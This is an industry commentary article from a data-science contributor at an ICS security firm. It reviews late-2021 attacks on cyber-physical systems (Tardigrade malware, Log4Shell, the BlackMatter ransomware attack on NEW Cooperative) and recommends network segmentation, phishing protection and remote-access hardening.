Adapting industrial control system (ICS) security to the new normal

Adapting industrial control system (ICS) security to the new normal

We are excited to bring Transform 2022 back in-person July 19 and virtually July 20 - 28. Join AI and data leaders for insightful talks and exciting networking opportunities. Register today!



Despite the number of high-profile attacks in the second half of 2021 slightly declining from earlier in the year, the impact of these attacks has not. With cyber-physical assets remaining highly connected, security measures for critical industrial, healthcare and enterprise ICS devices have taken the front seat. A recent report found that 34% of vulnerabilities disclosed in the second half of 2021 were among cyber-physical systems in the internet of things (IoT), information technology (IT) and internet of medical things (IoMT) verticals, proving the need for said security measures to encompass the entire extended internet of things (XIoT), not just operational technology (OT). 

Tardigrade malware

Spreading throughout several biomanufacturing facilities, the Tardigrade malware was responsible for at least two attacks in April and October on the healthcare sector that allowed bad actors to obtain sensitive company information and deploy malware.

A polymorphic malware, Tardigrade changes properties based on the different environments it finds itself in, making it hard to predict and protect against. BioBright researchers compared the Tardigrade malware to Smoke Loader and, more specifically, described it as having the functionality of a trojan, meaning that once installed on a victim network it searches for stored passwords, deploys a keylogger, starts exfiltrating data and establishes a backdoor for attackers to choose their own adventure.

In response to the known attacks, healthcare companies that could be at risk were warned to scan their biomanufacturing networks for any potential signs of an attack. In an advisory put out by the Bioeconomy Information Sharing and Analysis Center (BIO-ISAC), the nonprofit that initially published the Tardigrade research, they recommended treating networks as if they were compromised or will be compromised and review cybersecurity measures and adjust as needed.

Log4j

Another major vulnerability discovered in the second half of 2021, the Log4Shell vulnerability is a zero-day that was first uncovered in December and was found to be impacting the popular Java-based library for logging error messages, Log4j. Able to be executed by remote and unauthenticated users, there were over 100 known affected vendors, according to this list published by CISA, of which more than 20 are ICS vendors. 

Since the software was widely used in OT environments, it was equally as exploitable, and the remote ability for attack made it easy to do so. In response to the vulnerability’s discovery, Cybersecurity and Infrastructure Security Agency (CISA) director Jen Easterly noted that it presented an urgent challenge to network defenders, given its broad use. End users are reliant on their vendors, and the vendor community was asked to immediately identify, mitigate and patch the wide array of products using this software. Vendors were also advised to communicate with their customers to ensure end users knew that their product contained this vulnerability and should prioritize software updates.

New Cooperative ransomware attack 

A uniquely vulnerable industry, food and beverage manufacturers have seen a growing focus on their operations due to the devastation that a disruption in their production efforts could cause. Similar to the JBS Foods attack earlier in 2021, NEW Cooperative, an Iowa-based farmer cooperative that is part of the state’s agricultural supply chain, suffered a ransomware attack in September, carried out by BlackMatter

Similar to food processor JBS Foods, NEW Cooperative quickly and proactively took their systems offline to contain the attack and limit damage. With 40% of grain production running on its software and 11 million animals’ feed schedules relying on them, an attack would have quickly and negatively affected the food supply chain. 

Recommendations for ICS security

From the last six months of 2021, and after studying three different major attacks, security professionals can implement many different measures to fully protect the XIoT moving forward. ICS security measures include network segmentation, phishing and spam protection, and protecting remote-access connections. 

This year, awareness was brought to the fact that network segmentation is a key to being able to protect remotely-accessible internet-connected industrial devices. To best protect against these kinds of attacks, network administrators should ensure that their networks are segmented virtually and set up in such a way that they can be managed and controlled remotely.

In addition, phishing attempts have increased as a result of remote work and can be protected against by, among other things, not clicking links from unknown senders, not sharing passwords and enforcing multifactor authentication. 

Remote-access connections must also be protected as they’re a critically important aspect of the OT and industrial environments in the new normal. To do so, security professionals in these industries should verify that VPN vulnerabilities are patched, monitor any and all remote connections and enforce permissions and administrative controls related to user access.

Chen Fradkin is a data scientist at Claroty.


DataDecisionMakers

Welcome to the VentureBeat community!

DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation.

If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers.

You might even consider contributing an article of your own!

Read More From DataDecisionMakers